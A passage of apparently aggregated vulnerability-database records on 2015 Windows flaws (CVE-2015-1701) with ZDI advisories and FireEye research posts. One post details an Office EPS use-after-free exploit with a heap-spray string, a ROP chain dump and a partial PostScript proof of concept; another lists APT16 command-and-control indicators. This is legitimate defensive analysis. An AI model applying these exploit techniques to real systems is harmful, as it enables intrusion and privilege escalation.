\n[CVE-2015-1680](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2015-1680>) \n[CVE-2015-1672](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2015-1672>) \n[CVE-2015-1701](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2015-1701>) \n[CVE-2015-1677](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2015-1677>) \n[CVE-2015-1676](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2015-1676>) \n[CVE-2015-1681](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2015-1681>) 
\n[CVE-2015-1674](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2015-1674>) \n[CVE-2015-1673](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2015-1673>) \n[CVE-2015-1716](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2015-1716>) \n\n\n### *Impacts*:\nACE \n\n### *Related products*:\n[Microsoft Windows Vista](<https://threats.kaspersky.com/en/product/Microsoft-Windows-Vista-4/>)\n\n### *CVE-IDS*:\n[CVE-2015-1686](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-1686>)4.3Warning \n[CVE-2015-1684](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-1684>)4.3Warning \n[CVE-2015-1702](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-1702>)6.9High \n[CVE-2015-1679](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-1679>)2.1Warning \n[CVE-2015-1678](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-1678>)2.1Warning \n[CVE-2015-1680](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-1680>)2.1Warning \n[CVE-2015-1672](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-1672>)5.0Critical \n[CVE-2015-1701](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-1701>)7.2High \n[CVE-2015-1677](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-1677>)2.1Warning \n[CVE-2015-1676](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-1676>)2.1Warning \n[CVE-2015-1681](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-1681>)1.9Warning \n[CVE-2015-1674](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-1674>)1.9Warning \n[CVE-2015-1673](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-1673>)9.3Critical \n[CVE-2015-1716](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-1716>)5.0Critical\n\n### *Microsoft official advisories*:\n\n\n### *KB list*:\n[3045171](<http://support.microsoft.com/kb/3045171>) \n[3050941](<http://support.microsoft.com/kb/3050941>) \n[3049563](<http://support.microsoft.com/kb/3049563>) 
\n[3050946](<http://support.microsoft.com/kb/3050946>) \n[3050945](<http://support.microsoft.com/kb/3050945>) \n[3032655](<http://support.microsoft.com/kb/3032655>) \n[3055642](<http://support.microsoft.com/kb/3055642>) \n[3023221](<http://support.microsoft.com/kb/3023221>) \n[3051768](<http://support.microsoft.com/kb/3051768>) \n[3035490](<http://support.microsoft.com/kb/3035490>) \n[3023219](<http://support.microsoft.com/kb/3023219>) \n[3050514](<http://support.microsoft.com/kb/3050514>) \n[3057263](<http://support.microsoft.com/kb/3057263>) \n[3023211](<http://support.microsoft.com/kb/3023211>) \n[3023213](<http://support.microsoft.com/kb/3023213>) \n[3023215](<http://support.microsoft.com/kb/3023215>) \n[3023217](<http://support.microsoft.com/kb/3023217>) \n[3032662](<http://support.microsoft.com/kb/3032662>) \n[3032663](<http://support.microsoft.com/kb/3032663>) \n[3023220](<http://support.microsoft.com/kb/3023220>) \n[3057134](<http://support.microsoft.com/kb/3057134>) \n[3023222](<http://support.microsoft.com/kb/3023222>) \n[3061518](<http://support.microsoft.com/kb/3061518>) \n[3057191](<http://support.microsoft.com/kb/3057191>) \n[3035489](<http://support.microsoft.com/kb/3035489>) \n[3035488](<http://support.microsoft.com/kb/3035488>) \n[3035487](<http://support.microsoft.com/kb/3035487>) \n[3035486](<http://support.microsoft.com/kb/3035486>) \n[3035485](<http://support.microsoft.com/kb/3035485>) \n[3023223](<http://support.microsoft.com/kb/3023223>) \n[3023224](<http://support.microsoft.com/kb/3023224>)\n\n### *Exploitation*:\nThis vulnerability can be exploited by the following malware:", "edition": 41, "modified": "2020-06-18T00:00:00", "published": "2015-05-12T00:00:00", "id": "KLA10580", "href": "https://threats.kaspersky.com/en/vulnerability/KLA10580", "title": "\r KLA10580Multiple vulnerabilities in Microsoft products ", "type": "kaspersky", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}], "zdi": [{"lastseen": 
"2020-06-22T11:41:09", "bulletinFamily": "info", "cvelist": ["CVE-2015-1680"], "edition": 3, "description": "This vulnerability allows local attackers to leak sensitive information on vulnerable installations of Microsoft Windows. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file. The specific flaw exists within the handling of the NtUserRealInternalGetMessage function. The issue lies in the failure to sanitize a buffer before returning its contents resulting in the leak of a kernel address. An attacker can leverage this together with another vulnerability to achieve code execution at SYSTEM.", "modified": "2015-06-22T00:00:00", "published": "2015-05-12T00:00:00", "href": "https://www.zerodayinitiative.com/advisories/ZDI-15-188/", "id": "ZDI-15-188", "title": "Microsoft Windows NtUserRealInternalGetMessage Stack Information Disclosure Vulnerability", "type": "zdi", "cvss": {"score": 2.1, "vector": "AV:L/AC:L/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2020-06-22T11:40:00", "bulletinFamily": "info", "cvelist": ["CVE-2015-1676"], "edition": 3, "description": "This vulnerability allows local attackers to leak sensitive information on vulnerable installations of Microsoft Windows. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file. The specific flaw exists within the handling of the NtUserGetTitleBarInfo function. The issue lies in the failure to sanitize a buffer before returning its contents resulting in the leak of a kernel address. 
An attacker can leverage this together with another vulnerability to achieve code execution at SYSTEM.", "modified": "2015-06-22T00:00:00", "published": "2015-05-12T00:00:00", "href": "https://www.zerodayinitiative.com/advisories/ZDI-15-190/", "id": "ZDI-15-190", "title": "Microsoft Windows NtUserGetTitleBarInfo Information Disclosure Vulnerability", "type": "zdi", "cvss": {"score": 2.1, "vector": "AV:L/AC:L/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2020-06-22T11:40:13", "bulletinFamily": "info", "cvelist": ["CVE-2015-1677"], "edition": 3, "description": "This vulnerability allows local attackers to leak sensitive information on vulnerable installations of Microsoft Windows. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file. The specific flaw exists within the handling of the NtUserGetScrollBarInfo function. The issue lies in the failure to sanitize a buffer before returning its contents resulting in the leak of a kernel address. An attacker can leverage this together with another vulnerability to achieve code execution at SYSTEM.", "modified": "2015-06-22T00:00:00", "published": "2015-05-12T00:00:00", "href": "https://www.zerodayinitiative.com/advisories/ZDI-15-185/", "id": "ZDI-15-185", "title": "Microsoft Windows NtUserGetScrollBarInfo Stack Information Disclosure Vulnerability", "type": "zdi", "cvss": {"score": 2.1, "vector": "AV:L/AC:L/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2020-06-22T11:41:50", "bulletinFamily": "info", "cvelist": ["CVE-2015-1679"], "edition": 3, "description": "This vulnerability allows local attackers to leak sensitive information on vulnerable installations of Microsoft Windows. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file. The specific flaw exists within the handling of the NtUserGetMessage function. 
The issue lies in the failure to sanitize a buffer before returning its contents resulting in the leak of a kernel address. An attacker can leverage this together with another vulnerability to achieve code execution at SYSTEM.", "modified": "2015-06-22T00:00:00", "published": "2015-05-12T00:00:00", "href": "https://www.zerodayinitiative.com/advisories/ZDI-15-187/", "id": "ZDI-15-187", "title": "Microsoft Windows NtUserGetMessage Stack Information Disclosure Vulnerability", "type": "zdi", "cvss": {"score": 2.1, "vector": "AV:L/AC:L/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2020-06-22T11:41:51", "bulletinFamily": "info", "cvelist": ["CVE-2015-1678"], "edition": 3, "description": "This vulnerability allows local attackers to leak sensitive information on vulnerable installations of Microsoft Windows. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file. The specific flaw exists within the handling of the NtUserGetComboBoxInfo function. The issue lies in the failure to sanitize a buffer before returning its contents resulting in the leak of a kernel address. An attacker can leverage this together with another vulnerability to achieve code execution at SYSTEM.", "modified": "2015-06-22T00:00:00", "published": "2015-05-12T00:00:00", "href": "https://www.zerodayinitiative.com/advisories/ZDI-15-186/", "id": "ZDI-15-186", "title": "Microsoft Windows NtUserGetComboBoxInfo Stack Information Disclosure Vulnerability", "type": "zdi", "cvss": {"score": 2.1, "vector": "AV:L/AC:L/Au:N/C:P/I:N/A:N"}}], "fireeye": [{"lastseen": "2017-03-07T16:24:19", "bulletinFamily": "info", "cvelist": ["CVE-2015-1701"], "description": "As defensive security controls raise the bar to attack, attackers will employ increasingly sophisticated techniques to complete their mission. 
Understanding the mechanics and impact of these threats is essential to systematically discover and deflect the coming wave of advanced attacks.\n\nMandiant has developed a comprehensive whitepaper that provides a multi-faceted analysis of the exploit payload \"Operation RussianDoll.\" This payload is an exploit for CVE-2015-1701 embedded within the un-obfuscated 64-bit RussianDoll payload (MD5: 54656d7ae9f6b89413d5b20704b43b10). The whitepaper references a freely available open-source proof of concept and provides malware triage analysts, reverse engineers, and exploit analysts with tools and background information to recognize and analyze future exploits. It also covers how red team analysts can apply these principles to carve out exploit functionality or augment exploits to produce tools that will enhance effectiveness of security operations.\n\nThe whitepaper walks the reader through the payload's actions to understand how to loosely identify what it does once it has gained kernel privilege. It then discusses how to obtain higher-resolution answers from reverse engineering by using WinDbg to confirm assumptions, manipulate control flow, and observe exploit behavior. Building on this and other published sources, a technically detailed exploit analysis is assembled by examining the relevant portions of win32k.sys. 
Finally, the paper discusses how to extract and augment this exploit to load encrypted, unsigned drivers into the Windows 7 x64 kernel address space.\n\nWe hope this analysis will support security professionals' understanding of the malware used by Advanced Persistent Threat (APT) actors and of tools and techniques that may be used to conduct enhanced analysis.\n\n**[Download the \"Lessons from Operation RussianDoll\" whitepaper here](<https://www2.fireeye.com/Lessons-from-Operation-RussianDoll-Matryoshka-Mining.html>).**\n", "modified": "2016-03-09T11:00:00", "published": "2016-03-09T11:00:00", "id": "FIREEYE:DD763521BC45EC12711FE1A267C7D8DE", "href": "https://www.fireeye.com/blog/threat-research/2016/03/lessons-from-operation-russian-doll.html", "type": "fireeye", "title": "Lessons from Operation RussianDoll", "cvss": {"score": 7.2, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2017-03-07T16:24:18", "bulletinFamily": "info", "cvelist": ["CVE-2015-1701"], "description": "On Wednesday, Dec. 16, 2015, FireEye published [The EPS Awakens](<https://www.fireeye.com/blog/threat-research/2015/12/the_eps_awakens.html>), detailing an exploit targeting a previously unknown Microsoft Encapsulated Postscript (EPS) _dict_ copy use-after-free vulnerability that was silently patched by Microsoft on November 10, 2015. The blog described the technical details of the vulnerability, and the steps needed to bypass the EPS filter and obtain full read and write access to the system memory.\n\nIn this follow-up blog, we discuss the operational details of the spear phishing campaigns associated with the exploit. 
Specifically, we detail the lures, attachments, targeting and malware, and examine the China-based advanced persistent threat (APT) group responsible for one of the observed attacks.\n\nActivity Summary \n\n\nBetween November 26, 2015, and December 1, 2015, known and suspected China-based APT groups launched several spear phishing attacks targeting Japanese and Taiwanese organizations in the high-tech, government services, media and financial services industries. Each campaign delivered a malicious Microsoft Word document exploiting the aforementioned EPS _dict_ copy use-after-free vulnerability, and the local Windows privilege escalation vulnerability CVE-2015-1701. The successful exploitation of both vulnerabilities led to the delivery of either a downloader that we refer to as IRONHALO, or a backdoor that we refer to as ELMER.\n\nThanksgiving Day Parade \n\n\nOn November 26, 2015, a suspected China-based APT group sent Japanese defense policy-themed spear phishing emails to multiple Japanese financial and high-tech companies. As shown in Figure 1, the emails originated from the Yahoo! email address **mts03282000@yahoo.co[.]jp**, and contained the subject \u201c**\u65b0\u5e74\u53f7\u5dfb\u982d\u8a00\u306e\u9001\u4ed8**\u201d (Google Translation: Sending of New Year No. Foreword).\n\nFigure 1. November 26, 2015 Phish SMTP header \n \nEach phishing message contained the same malicious Microsoft Word attachment. The malicious attachment resembled an article hosted on a legitimate Japanese defense-related website, as both discussed national defense topics and carried the same byline. The lure documents also used the Japanese calendar, as indicated by the 27th year in the Heisei period. 
This demonstrates that the threat actors understand conventional Japanese date notation.\n\nIRONHALO Downloader\n\nFollowing the exploitation of the EPS and CVE-2015-1701 vulnerabilities, the exploit payload drops either a 32-bit or 64-bit binary containing an embedded IRONHALO malware sample. IRONHALO is a downloader that uses the HTTP protocol to retrieve a Base64 encoded payload from a hard-coded command-and-control (CnC) server and uniform resource locator (URL) path. \n\nThe encoded payload is written to a temporary file, decoded and executed in a hidden window. The encoded and decoded payloads are written to files named igfxHK[%rand%].dat and igfxHK[%rand%].exe respectively, where [%rand%] is a 4-byte hexadecimal number based on the current timestamp.\n\nTable 1. IRONHALO artifacts\n\nIRONHALO persists by copying itself to the current user\u2019s Startup folder. This variant sends an HTTP request to a legitimate Japanese website using a malformed User-Agent string, as shown in Figure 2. The threat actors likely compromised the legitimate site and attempted to use it as a staging server for second-stage payloads.\n\nFigure 2. IRONHALO HTTP GET request\n\n# December to Remember\n\nOn December 1, 2015, threat actors launched two additional spear phishing attacks exploiting the undisclosed EPS vulnerability and CVE-2015-1701. Unlike the Nov. 26 campaign, these attacks targeted Taiwanese governmental and media and entertainment organizations. Moreover, the exploit dropped a different malware payload, a backdoor we refer to as ELMER.\n\n### Lure Number One\n\nThe first spear phishing message was sent to a Taiwanese governmental employee on Dec. 1. The attachment was created using the traditional Chinese character set, and contained a flowchart that appeared to be taken from the legitimate Taiwanese government auction website **hxxp://shwoo.gov[.]taipei/buyer_flowchart.asp**. 
The image, shown in Figure 3, is a flowchart detailing how to place a trade on the Taipei Nature and Cherish Network website.\n\n\n\nFigure 3: Lure Image\n\n### Lure Number Two\n\nThe second December spear phishing attack targeted Taiwan-based news media organizations. The emails originated from the address **dpptccb.dpp@msa.hinet[.]net **(Figure 4),** **and contained the subject **DPP's Contact Information Update.** Based on the email address naming convention and message subject, the threat actors may have tried to make the message appear to be a legitimate communication from the Democratic Progressive Party (DPP), Taiwan\u2019s opposition party.\n\nFigure 4. December 1 Lure 2 SMTP Header\n\nUnlike the previous exploit documents, this malicious attachment did not contain any visible text when opened in Microsoft Word.\n\n### ELMER Backdoor\n\nThe exploit documents delivered during the December campaigns dropped a binary containing an embedded variant of a backdoor we refer to as ELMER. ELMER is a non-persistent proxy-aware HTTP backdoor written in Delphi, and is capable of performing file uploads and downloads, file execution, and process and directory listings.\n\nTo retrieve commands, ELMER sends HTTP GET requests to a hard-coded CnC server, and parses the HTTP response packets received from the CnC server for an integer string corresponding to the command that needs to be executed. Table 2 lists the ELMER backdoors observed during the December campaigns.\n\nTable 2. ELMER variants\n\nThe ELMER variant **6c33223db475f072119fe51a2437a542** beaconed to the CnC IP address **121.127.249.74** over port 443. However the ELMER sample **0b176111ef7ec98e651ffbabf9b35a18** beaconed to the CnC domain **news.rinpocheinfo[.]com** over port 443. Both samples used the hard-coded User-Agent string \u201cMozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; SV1)\u201d, as shown in Figure 5.\n\nFigure 5. 
ELMER beacon\n\n# APT16\n\nWhile attribution of the first two spear phishing attacks is still uncertain, we attribute the second December phishing campaign to the China-based APT group that we refer to as APT16. This is based on the use of the known APT16 domain **rinpocheinfo[.]com**, as well as overlaps in previously observed targeting and tactics, techniques and procedures (TTPs).\n\n#### Background\n\nTaiwanese citizens will go to the polls on January 16, 2016, to choose a new President and legislators. According to recent opinion polls, the Democratic Progressive Party (DPP) candidate Tsai Ing-wen is leading her opponents and is widely expected to win the election. The DPP is part of the pan-green coalition that favors Taiwanese independence over reunification with the mainland, and the party\u2019s victory would represent a shift away from the ruling Kuomintang\u2019s closer ties with the PRC. Since 1949, Beijing has claimed Taiwan as a part of China and strongly opposes any action toward independence. The Chinese government is therefore concerned whether a DPP victory might weaken the commercial and tourism ties between China and Taiwan, or even drive Taiwan closer to independence. In 2005, the Chinese government passed an \u201canti-secession\u201d law that signified its intention to use \u201cnon-peaceful\u201d means to stymie any Taiwanese attempt to secede from China.\n\n#### Targeting Motivations\n\nAPT16 actors sent spear phishing emails to two Taiwanese media organization addresses and three webmail addresses. The message subject read \u201cDPP\u2019s Contact Information Update\u201d, apparently targeting those interested in contact information for DPP members or politicians. The Chinese government would benefit from improved insight into local media coverage of Taiwanese politics, both to better anticipate the election outcome and to gather additional intelligence on politicians, activists, and others who interact with journalists. 
This tactic is not without precedent; in 2013, the New York Times [revealed](<http://www.nytimes.com/2013/01/31/technology/chinese-hackers-infiltrate-new-york-times-computers.html>) it had been the target of China-based actors shortly after it reported on the alleged mass accumulation of [wealth](<http://www.nytimes.com/2012/10/26/business/global/family-of-wen-jiabao-holds-a-hidden-fortune-in-china.html>) by then-Prime Minister Wen Jiabao and his family. The actors likely sought information on the newspaper\u2019s sources in China, who could be silenced by the government.\n\nCompromising these Taiwanese news organizations would also allow the actors to gain access to informants or other protected sources, who might then be targeted for further intelligence collection or even retribution. The webmail addresses, while unknown, were possibly the personal-use addresses of the individuals whose corporate domain emails were targeted. As corporate networks become more secure and users become more vigilant, personal accounts can still offer a means to bypass security systems. This tactic exploits users\u2019 reduced vigilance when reading their own personal email, even when using corporate IT equipment to do so.\n\nOn the same date that APT16 targeted Taiwanese media, suspected Chinese APT actors also targeted a Taiwanese government agency, sending a lure document that contained instructions for registration and subsequent listing of goods on a local Taiwanese auction website. It is possible, although not confirmed, that APT16 was also responsible for targeting this government agency, given both the timeframe and the use of the same n-day to eventually deploy the ELMER backdoor.\n\n#### We\u2019ve Been Here Before\n\nOne of the media organizations involved in this latest activity was targeted in June 2015, while its Hong Kong branch was similarly targeted in August 2015. APT16 actors were likely also responsible for the June 2015 activity. 
They sent spear phishing messages with the subject \u201c2015 Taiwan Security and Cultural Forum Invitation Form\u201d (2015\u53f0\u7063\u5b89\u5168\u6587\u5316\u8ad6\u58c7\u9080\u8acb\u51fd), and used a different tool \u2013 a tool that we refer to as DOORJAMB \u2013 in their attempt to compromise the organization. A different group, known as **admin@338**, used LOWBALL malware during its [Hong Kong activity](<https://www.fireeye.com/blog/threat-research/2015/11/china-based-threat.html>). Despite the differing sponsorship, penetration of Hong Kong- and Taiwan-based media organizations continues to be a priority for China-based threat groups.\n\nThe difference in sponsorship could be the result of tasking systems that allocate targeting responsibility to different groups based on their targets\u2019 geographic location. In other words, while media organizations are important targets, it is possible that two separate groups are responsible for Hong Kong and Taiwan, respectively. The suspected APT16 targeting of the Taiwanese government agency \u2013 in addition to the Taiwanese media organizations \u2013 further supports this possibility.\n\n# Conclusion\n\nTable 3 contains a summary of the phishing activity detailed in this blog.Table 3. Activity summary\n\nThese clusters of activity raise interesting questions about the use of an identical silently-patched vulnerability, possibly by multiple threat groups. Both Japan and Taiwan are important intelligence collection targets for China, particularly because of recent changes to Japan\u2019s pacifist constitution and the upcoming Taiwanese election. Based on our visibility and available data, we only attribute one campaign to the Chinese APT group APT16. 
Nonetheless, the evidence suggests the involvement of China-based groups.\n", "modified": "2015-12-20T19:45:00", "published": "2015-12-20T19:45:00", "id": "FIREEYE:DA0253A0F53034703ED2573D2065BC4E", "href": "https://www.fireeye.com/blog/threat-research/2015/12/the-eps-awakens-part-two.html", "type": "fireeye", "title": "The EPS Awakens - Part 2", "cvss": {"score": 7.2, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2017-03-07T16:24:19", "bulletinFamily": "info", "cvelist": ["CVE-2015-2545", "CVE-2015-2546", "CVE-2015-1701"], "description": "On September 8, FireEye published details about an attack exploiting zero day vulnerabilities in Microsoft Office ([CVE-2015-2545](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-2545>)) and Windows ([CVE-2015-2546](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-2546>)). The attack was particularly notable because it leveraged PostScript to drive memory corruption in a way that had never been seen before. The exploit used similar strategies as browser exploits in common languages such as JavaScript and Flash, but PostScript served as an overlooked attack vector that is powerful and convenient in Office.\n\nFollowing the release of the patch for CVE-2015-2545, FireEye notified Microsoft of a way to bypass the patch. Microsoft not only fixed the bypass, but proactively hardened code throughout the Encapsulated PostScript (EPS) filter. The updates were quietly released on November 10 (Patch Tuesday).\n\nAt around 10:00AM in Japan on November 26 (around close of business the day before Thanksgiving in the U.S.), threat actors launched a spear phishing campaign. The emails contained document attachments that exploited a previously unknown EPS vulnerability. But there was a catch: the vulnerability was proactively patched in the Microsoft update released two weeks earlier.\n\nThe spearphishing emails to FireEye EX customers were blocked in the wild. 
FireEye appliances detect the exploit as Exploit.Dropper.docx.MVX and Malware.Binary.Docx.\n\nIn the first part of this blog series, we summarize recent threat group activity using this exploit and provide complete technical details of the vulnerability. Stay tuned for part two wherein we outline the operational details of the attack.\n\n#### Activity Summary\n\nIn late November and early December of 2015, FireEye observed multiple spear phishing campaigns exploiting a previously unknown Microsoft Office EPS vulnerability (detailed below) and Windows local privilege escalation vulnerability CVE-2015-1701. Over the course of several days, known and suspected China-based advanced persistent threat (APT) groups sent phishing emails containing malicious Word attachments to Japanese and Taiwanese organizations in the financial services, high-tech, media and government sectors respectively.\n\nThese attachments exploited a silently patched user-mode Microsoft EPS vulnerability (similar to Microsoft EPS use-after-free vulnerability CVE-2015-2545) and subsequently used CVE-2015-1701 to obtain SYSTEM level access to compromised machines. Following successful exploitation of each vulnerability, the exploit shellcode deployed either the IRONHALO downloader or the ELMER backdoor. FireEye currently detects IRONHALO as Trojan.IRONHALO.Downloader and ELMER as Backdoor.APT.Suroot.\n\n#### Vulnerability Details \u2013 Encapsulated PostScript dict copy Use-After-Free\n\n\n\nIn the form _dict1_ _dict2_ **copy**, the **copy** operator copies all of the elements from the first operand (_dict1_) into the second operand (_dict2_). [The PostScript Language Reference Manual (PLRM)](<http://www-cdf.fnal.gov/offline/PostScript/PLRM2.pdf>), as cited in Figure 1, states that the copy operator does not affect elements remaining in the second operand. 
For example, if _dict1 _contained an element under key _k1_, and _dict2 _contained elements under keys _k1_ and _k2_, then the operation _dict1_ _dict2_ **copy** should overwrite the element under _k1_, but should not affect the element under _k2_.\n\nHowever, Microsoft\u2019s EPS deviates from this standard. In Microsoft\u2019s implementation, the **copy **operator iteratively deletes all key-value entries from the _dict2_ internal hash table. Then, it deletes the hash table itself, and allocates a new one. Finally, it copies elements from _dict2_ into _dict2_. This deletion process is depicted in Figure 2.\n\n\n\nUsing the _dict1_ _dict2_ **copy **operation while enumerating _dict2_ with **forall **causes a use-after-free. During each iteration of the **forall** loop, _dict2_ dereferences a pointer (ptrNext) to push the next key-value pair onto the operator stack. When **copy** deletes the next key-value pair, ptrNext becomes stale. The next iteration of the **forall** loop will then push objects from the stale pointer onto the operator stack.\n\nIn an attack scenario, the attacker can allocate memory under the stale pointer. The attacker can then supply data that the **forall** enumerator reads as a key-value pair. In the appendix, we include a minimized PoC that shows how to allocate a string under the stale pointer and forge a key-value pair.\n\n#### Full Read and Write Development\n\nThe attacker gains access to memory by forging a string. Specifically, the attacker places a forged key-value pair under the stale ptrNext, and the key-value pair points to a forged string. The attacker uses a hardcoded address (130e0020h) in the forged key-value pair, and sprays memory at the address with PostScript strings. 
Figure 3 shows the PostScript that creates the sprayed string object, and the layout of the string in memory.\n\n/fakestr <28000e1358000e13bebafeca41414141414141414141414141414141030000004141414141414141414 \n1414124000e1300000000ffffff7fbebafeca41414141414141414141414141414141414141414141414 \n14141414100000000ffffff7f> def\n\n0:000> dd 130e0000 \n130e0000 00000000 00000000 00000000 00000000 \n130e0010 00000000 00000000 00000000 00000000 \n130e0020 130e0028 130e0058 cafebabe 41414141 \n130e0030 41414141 41414141 41414141 00000003 \n130e0040 41414141 41414141 41414141 130e0024 \n130e0050 00000000 7fffffff cafebabe 41414141 \n130e0060 41414141 41414141 41414141 41414141 \n130e0070 41414141 41414141 00000000 7fffffff\n\nFigure 3: The attacker's sprayed PostScript string\n\nEach PostScript string object allocates a buffer to store the actual contents of the string. The address and size of this buffer is stored within the string object. In the attacker\u2019s forged string object, the address of the buffer is 0, and the size of the buffer is 0x7fffffff.\n\n#### Return-Oriented Programming\n\nOnce the attacker has forged a string with size 0x7fffffff, they can use the string to freely read and write process memory. 
The attacker uses this capability to search for ROP gadgets and build a ROP chain.\n\n0:000> dd /c 1 130e1032 \n130e1032 60e2b53a // retn_gadget \n130e1036 60e2b53a // retn_gadget \n130e103a 00000000 \n130e103e 00000000 \n130e1042 60e69f80 // stack_pivot_gadget \n130e1046 60e398cd // set_eax_gadget, eax = 0xd7 \n130e104a 00000000 \n130e104e 00000000 \n130e1052 00000000 \n130e1056 777e5695 // ntcreateevent_gadget+0x5, NtProtectVirtualMemory \n130e105a 130e3000 // shellcode starts here \n130e105e ffffffff \n30e1062 130e0200 \n130e1066 130e0204 \n130e106a 00000040 \n130e106e 130e0208\n\n0:000> u 60e2b53a \nEPSIMP32+0xb53a: \n60e2b53a c20c00 ret 0Ch \n0:000> u 60e69f80 \nEPSIMP32!RegisterPercentCallback+0x2234e: \n60e69f80 94 xchg eax,esp \n60e69f81 c3 ret \n0:000> u 60e398cd \nEPSIMP32+0x198cd: // ecx = 130e1000, eax = 0xd760e398cd 8b4114 mov eax,dword ptr [ecx+14h] \n60e398d0 c3 ret \n0:000> u 777e5695 \nntdll!NtCreateEvent+0x5: \n777e5695 ba0003fe7f mov edx,offset SharedUserData!SystemCallStub \n777e569a ff12 call dword ptr [edx] \n777e569c c21400 ret 14h\n\nFigure 4: Attacker's ROP chain\n\nThe ROP chain, shown in Figure 4, uses a few known tricks to bypass security products. First, the ROP chain skips 5 bytes past the beginning of ntdll!NtCreateEvent. This would bypass any hooks placed on the beginning of the routine (and is known as \u201chook hopping\u201d), but the real purpose of this offset is to pass over an instruction that sets eax. This allows the attacker to specify their own parameter in eax, and call an arbitrary system call instead of NtCreateEvent. The attacker chooses the system call NtProtectVirtualMemory, which marks the attacker\u2019s shellcode as executable. 
Since the system call numbers differ between environments, the attacker reads the correct value for eax from the ntdll!NtProtectVirtualMemory function (which is the user-mode function that is normally used to call the NtProtectVirtualMemory syscall).\n\nTo transfer execution to the ROP chain, the attacker forges a file type object. Within the forged file type object, the attacker modifies the bytesavailable function pointer to point to a pivot (Figure 5). Then, when the attacker uses the forged object in PostScript, it calls the pivot and transfers execution to the ROP chain. When the ROP chain is complete, it returns into the attacker\u2019s shellcode.\n\n\n\nFigure 5: bytesavailable operator with the forged file type object \n\n\n#### Shellcode\n\nOnce the ROP chain finishes and returns to the attacker\u2019s shellcode, the shellcode loads a DLL that exploits CVE-2015-1701 to elevate the process to SYSTEM. The CVE-2015-1701 exploit is based on published source code from GitHub. Once the shellcode process has SYSTEM privileges, it will execute further payloads to be discussed in part two of this series.\n\n#### Acknowledgements\n\nThank you to Wang Yu, Dan Regalado and Junfeng Yang for their contributions to this blog.\n\n#### Appendix \nSimplified PoC\n\n%% Create dict2 and fill it with \n%% several key-value pairs \n/dict2 5 dict def \ndict2 begin \n/k1 1000 array def \n/k2 1000 array def \n\u2026 \ndict2 end\n\n%% Create dict1 and fill it with \n%% one key-value pair under k1 \n/dict1 3 dict def \ndict1 begin \n/k1 1000 array def \ndict1 end\n\n%% Begin forall enumeration on dict2 \ndict2 { \n\u2026 \n% Destroy dict2\u2019s internal hash-table, \n% freeing all key-value pairs \ndict1 dict2 copy \n\u2026 \n% Create a new string to overwrite the \n% freed key-value pair k2. 
\n% The string contains a forged key-value pair \n44 string \n0 <00000000ff0300000005000000000000000000002000e01303000000000000000000000044444444> putinterval \n% Next iteration of the loop uses stale. \n% ptrNext, which points into the above string, \n% and reads a forged key-pair \n\u2026 \n} forall\n", "modified": "2015-12-16T08:00:00", "published": "2015-12-16T08:00:00", "id": "FIREEYE:3E40A37BC7E6861E0920355DC6CAEDD1", "href": "https://www.fireeye.com/blog/threat-research/2015/12/the_eps_awakens.html", "type": "fireeye", "title": "The EPS Awakens", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "myhack58": [{"lastseen": "2016-10-30T11:15:20", "bulletinFamily": "info", "cvelist": ["CVE-2015-1701"], "edition": 1, "description": "Win32k elevation of privilege vulnerability \u2013 CVE-2 0 1 5-1 7 0 1 \nIf Win32k.sys kernel-mode driver improperly handles objects in memory, then there is a privilege elevation vulnerability. Successful exploitation of this vulnerability an attacker can run arbitrary code in kernel mode is. An attacker could then install programs; view, change, or delete data; or create with full user permissions to the new account. The update addresses the vulnerabilities by correcting Windows kernel-mode driver handles objects in memory to resolve the vulnerability. \nTo exploit this vulnerability, an attacker must be logged in to the system. Then, the attacker can run a to exploit this vulnerability a specially crafted application, so complete control of the affected system. \nThis vulnerability has been publicly disclosed. This security Bulletin was issued, Microsoft has informed that will exploit the vulnerability to very limited, targeted attacks. \nhttps://technet.microsoft.com/library/security/MS15-051 \n\nWin32k Elevation of Privilege Vulnerability. 
